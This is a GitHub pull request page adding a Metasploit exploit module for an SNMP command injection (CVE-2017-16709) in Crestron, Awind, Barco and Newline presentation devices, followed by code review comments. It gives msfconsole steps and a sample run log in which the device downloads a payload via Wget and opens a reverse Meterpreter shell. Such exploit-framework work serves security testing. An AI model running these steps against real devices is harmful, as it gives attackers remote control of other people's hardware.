
CVE-2017-16709 - Awind SNMP RCE #11643

Merged
merged 15 commits into from Sep 4, 2019

Conversation

@QKaiser
Contributor

commented Mar 27, 2019

Description

This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to the ftpfw.sh system command, leading to command injection.

Note: a valid SNMP read-write community is required to exploit this vulnerability.

Vulnerable Devices

The following devices are known to be affected by this issue:

  • Crestron Airmedia AM-100 <= version 1.5.0.4
  • Crestron Airmedia AM-101 <= version 2.5.0.12
  • Awind WiPG-1600w <= version 2.0.1.8
  • Awind WiPG-2000d <= version 2.1.6.2
  • Barco wePresent 2000 <= version 2.1.5.7
  • Newline Trucast 2 <= version 2.1.0.5
  • Newline Trucast 3 <= version 2.1.3.7

Other devices might be affected by the same issue, but a lack of access to firmware prevents me from confirming that. See https://github.com/QKaiser/awind-research for the full list of similar devices.

Verification steps

  1. Start msfconsole
  2. Do: use exploit/linux/snmp/awind_snmp_exec
  3. Do: set payload linux/armle/meterpreter/reverse_tcp
  4. Do: set RHOST [IP]
  5. Do: set LHOST [IP]
  6. Do: run

You should get a session.

Sample run

msf5 > use exploit/linux/snmp/awind_snmp_exec
msf5 exploit(linux/snmp/awind_snmp_exec) > set payload linux/armle/meterpreter/reverse_tcp 
payload => linux/armle/meterpreter/reverse_tcp
msf5 exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2
RHOSTS => 192.168.100.2
msf5 exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1
LHOST => 192.168.100.1
msf5 exploit(linux/snmp/awind_snmp_exec) > check

[*] Target system is Crestron Electronics AM-100 (Version 2.6.0.6)
[+] 192.168.100.2:161 The target is vulnerable.
msf5 exploit(linux/snmp/awind_snmp_exec) > run

[*] Started reverse TCP handler on 192.168.100.1:4444 
[*] Using URL: http://0.0.0.0:8080/u70HALC
[*] Local IP: http://192.168.1.10:8080/u70HALC
[*] Injecting payload
[*] Injection successful
[*] Triggering call
[*] Trigger successful
[*] Client 192.168.100.2 (Wget) requested /u70HALC
[*] Sending payload to 192.168.100.2 (Wget)
[*] Sending stage (806872 bytes) to 192.168.100.2
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.2:38009) at 2019-03-28 11:01:41 +0100
[*] Server stopped.

meterpreter > sysinfo
Computer     : Crestron.AirMedia-1.1.wm8750
OS           :  (Linux 2.6.32.9-default)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux

References

@wvu-r7

Contributor

commented Mar 27, 2019

Nice find! I'd add a CmdStager target if possible.

@cbrnrd
Contributor

left a comment

Small things

# AM-100 and AM-101 considered EOL, no fix so no need to check version.
if sys_description.include? "Crestron Electronics AM-100" or sys.description.include? "Crestron Electronics AM-101"
return Exploit::CheckCode::Vulnerable
end
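Review bot: the second operand of the condition calls sys.description.include?, but the value read from the agent is held in the local sys_description; on an AM-101 the first operand is false, so evaluation reaches the undefined `sys` and raises NameError instead of returning Vulnerable, meaning the check only ever succeeds for the AM-100 string. Use `sys_description.include?('Crestron Electronics AM-101')`, or a single regex such as `/Crestron Electronics (AM-100|AM-101)/`, for both models.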

@cbrnrd

cbrnrd Mar 28, 2019

Contributor

Shrink this down to one line (unless officer RuboCop gets mad):

return Exploit::CheckCode::Vulnerable if sys_description.include? "Crestron Electronics AM-100" or sys.description.include? "Crestron Electronics AM-101"

Also probably want to replace or with ||

@QKaiser

QKaiser Mar 28, 2019

Author Contributor

See fbaebc1

@bcoles

bcoles Mar 28, 2019

Contributor

|| is preferred over or, which requires using () for the include?() calls.

A regex would decrease line length and duplication:

return CheckCode::Vulnerable if sys_description =~ /Crestron Electronics (AM-100|AM-101)/

Also, Exploit:: prefix is redundant in Exploit context.

Better yet, based on your TODO, something like this:

model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
case model
when 'AM-100', 'AM-101'
  return CheckCode::Vulnerable
when 'some other model'
  return CheckCode::Vulnerable
else
  return CheckCode::Safe
end
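As an added example (not the module's own code and not bcoles's suggestion), the model-based check above carried one step further: parse the sysDescr string, look the model up in the affected list from the PR description, treat the EOL AM-100/AM-101 as vulnerable at any firmware version (as the reviewed code comment states), and compare firmware versions for the other models. It assumes a sysDescr of the form "<vendor> <model> (Version x.y.z.w)", the only layout the sample run on this page shows; other vendors may format it differently.

```ruby
require 'rubygems'

# Last affected firmware per model, taken from the "Vulnerable Devices" list.
# nil marks the Crestron AM-100/AM-101, which are EOL with no fixed version.
AFFECTED = {
  'AM-100'         => nil,
  'AM-101'         => nil,
  'WiPG-1600w'     => '2.0.1.8',
  'WiPG-2000d'     => '2.1.6.2',
  'wePresent 2000' => '2.1.5.7',
  'Trucast 2'      => '2.1.0.5',
  'Trucast 3'      => '2.1.3.7'
}.freeze

# One alternation over every known model string; capture group 1 is the model.
MODEL_RE   = /(#{AFFECTED.keys.map { |m| Regexp.escape(m) }.join('|')})/
# Assumed sysDescr version layout, e.g. "Crestron Electronics AM-100 (Version 2.6.0.6)".
VERSION_RE = /\(Version\s+([\d.]+)\)/

# Returns [model, version] (version may be nil) or nil when no known model appears.
def parse_sys_descr(sys_descr)
  model = sys_descr[MODEL_RE, 1]
  return nil unless model
  [model, sys_descr[VERSION_RE, 1]]
end

# :vulnerable  - known model at or below its last affected version (or EOL model)
# :safe        - unknown model, or known model above its last affected version
# :unknown     - known model whose version could not be parsed from sysDescr
def check_device(sys_descr)
  model, version = parse_sys_descr(sys_descr)
  return :safe if model.nil?

  last_bad = AFFECTED[model]
  return :vulnerable if last_bad.nil?   # EOL: every firmware build is affected
  return :unknown if version.nil?

  Gem::Version.new(version) <= Gem::Version.new(last_bad) ? :vulnerable : :safe
end
```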

@QKaiser

QKaiser Apr 30, 2019

Author Contributor

See 8ec5a12

print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt

@cbrnrd

cbrnrd Mar 28, 2019

Contributor

What would cause this except a Ctrl+c? If it's just that then this is unnecessary.

@QKaiser

QKaiser Mar 28, 2019

Author Contributor

I based my code on auxiliary/scanner/snmp/snmp_enum (see https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/snmp/snmp_enum.rb#L870), but I'll be happy to remove it if not required.

@QKaiser

QKaiser Apr 30, 2019

Author Contributor

@bcoles what do you think? Should I follow the snmp_enum pattern or simply remove the interrupt catch?

print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt

@cbrnrd

cbrnrd Mar 28, 2019

Contributor

Same as above comment

@QKaiser

QKaiser Mar 28, 2019

Author Contributor

See above.

modules/exploits/linux/snmp/awind_snmp_exec.rb (outdated, resolved)
print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt

@cbrnrd

cbrnrd Mar 28, 2019

Contributor

Same as above comment

modules/exploits/linux/snmp/awind_snmp_exec.rb (outdated, resolved)
modules/exploits/linux/snmp/awind_snmp_exec.rb (outdated, resolved)
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
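Review bot: rescue ::Exception => e also swallows Interrupt, SystemExit and NoMemoryError, which is the only reason the preceding rescue ::Interrupt / raise $! clause is needed; narrowing the catch-all to StandardError (as suggested above) lets Interrupt propagate on its own, so both lines of the Interrupt clause can be dropped, and where a re-raise is kept a bare `raise` re-raises $! without naming it.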

@cbrnrd

cbrnrd Mar 28, 2019

Contributor

It's generally bad practice to catch Exception unless there is a specific reason to do so. Catch StandardError instead.

@cbrnrd

cbrnrd Mar 28, 2019

Contributor

This applies to all times you catch ::Exception

@QKaiser

QKaiser Mar 28, 2019

Author Contributor

I based my code on auxiliary/scanner/snmp/snmp_enum (see https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/snmp/snmp_enum.rb#L872). Once again, happy to remove it if it is safe to do so :)

@QKaiser

QKaiser Apr 30, 2019

Author Contributor

@bcoles what do you think? Should I follow the snmp_enum pattern or simply remove the general exception handler?

@QKaiser

Contributor Author

commented Mar 28, 2019

Nice find! I'd add a CmdStager target if possible.

See cbcc2f2

@wvu-r7

Contributor

commented Mar 28, 2019

@QKaiser: I meant just add a CmdStager target. ARCH_CMD is valuable, too.

@QKaiser

Contributor Author

commented Mar 28, 2019

@wvu-r7 I looked around for inspiration and fixed the module to support both ARCH_ARMLE and ARCH_CMD using modules/exploit/linux/http/axis_srv_parhand_rce as a template.

Let me know what you think.

QKaiser and others added 2 commits Jun 25, 2019
Fix disclosure date format.
Co-Authored-By: @shellfail <jrobles@rapid7.com>
@space-r7

Contributor

commented Sep 3, 2019

Are there any outstanding changes left for this module? I did a once-over, and I have no suggestions for improvements.

Hey, @QKaiser, I'm not sure that we have any of these vulnerable devices so could you send a PCAP to msfdev[at]metasploit.com when you have some time? Thank you!

@QKaiser

Contributor Author

commented Sep 3, 2019

Are there any outstanding changes left for this module? I did a once-over, and I have no suggestions for improvements.

I don't think so.

Hey, @QKaiser, I'm not sure that we have any of these vulnerable devices so could you send a PCAP to msfdev[at]metasploit.com when you have some time? Thank you!

Sure. I should be able to send a capture in the coming days, will notify you here when it's done :)

@space-r7

Contributor

commented Sep 3, 2019

Sure. I should be able to send a capture in the coming days, will notify you here when it's done :)

Awesome! Thanks!

@space-r7 space-r7 self-assigned this Sep 3, 2019

@QKaiser

Contributor Author

commented Sep 4, 2019

@space-r7 Just sent out the traffic capture ;-)

@space-r7

Contributor

commented Sep 4, 2019

@space-r7 Just sent out the traffic capture ;-)

Got it, thanks!

space-r7 added a commit that referenced this pull request Sep 4, 2019

@space-r7 space-r7 merged commit 94dd2b1 into rapid7:master Sep 4, 2019

3 checks passed

  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Sep 4, 2019
@space-r7

Contributor

commented Sep 4, 2019

Release Notes

The AwindInc SNMP Service Command Injection module has been added to the framework. It exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, which leads to command injection.

@tdoan-r7 tdoan-r7 added the rn-modules label Sep 9, 2019
